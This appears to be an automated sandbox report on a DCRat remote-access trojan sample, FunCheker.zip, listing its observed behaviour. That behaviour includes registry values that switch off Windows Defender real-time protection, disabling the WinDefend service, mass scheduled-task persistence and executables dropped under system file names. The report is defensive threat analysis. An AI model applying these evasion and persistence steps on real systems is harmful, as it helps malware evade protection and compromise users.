Malware Analysis Report

2024-11-15 05:53

Sample ID 240722-xpxqfssfle
Target FunCheker.zip
SHA256 0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9
Tags
dcrat evasion infostealer rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0cf56a65f8c8d0147fae630441e029d4c0c739ddf1198e8f4eedb1778fe16ed9

Threat Level: Known bad

The file FunCheker.zip was found to be: Known bad.

Malicious Activity Summary

dcrat evasion infostealer rat trojan

Modifies security service

Modifies Windows Defender Real-time Protection settings

DcRat

Process spawned unexpected child process

DCRat payload

Executes dropped EXE

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 19:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 19:02

Reported

2024-07-22 19:05

Platform

win10-20240404-en

Max time kernel

135s

Max time network

137s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FunCheker.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FunCheker.zip

Network

Country Destination Domain Proto
US 52.111.229.48:443 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 19:02

Reported

2024-07-22 19:05

Platform

win10-20240611-en

Max time kernel

150s

Max time network

82s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Multimedia Platform\cc11b995f2a76d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Internet Explorer\images\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Configuration\5940a34987c991 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows NT\TableTextService\dllhost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows NT\TableTextService\5940a34987c991 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Windows Mail\en-US\6dd19aba3e2428 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Windows Multimedia Platform\winlogon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Internet Explorer\images\cmd.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Uninstall Information\comcommon.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files\Uninstall Information\a1e76cf482601b C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\56085415360792 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SchCache\ebf1f9fa8afd6d C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\en-US\csrss.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\en-US\886983d96e3d3e C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\uk-UA\sppsvc.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\uk-UA\0a1fd5f707cd16 C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
File created C:\Windows\SchCache\cmd.exe C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Recovery\WindowsRE\explorer.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A
N/A N/A C:\Recovery\WindowsRE\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4756 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 4756 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 4756 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 4756 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 3800 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3800 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3228 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
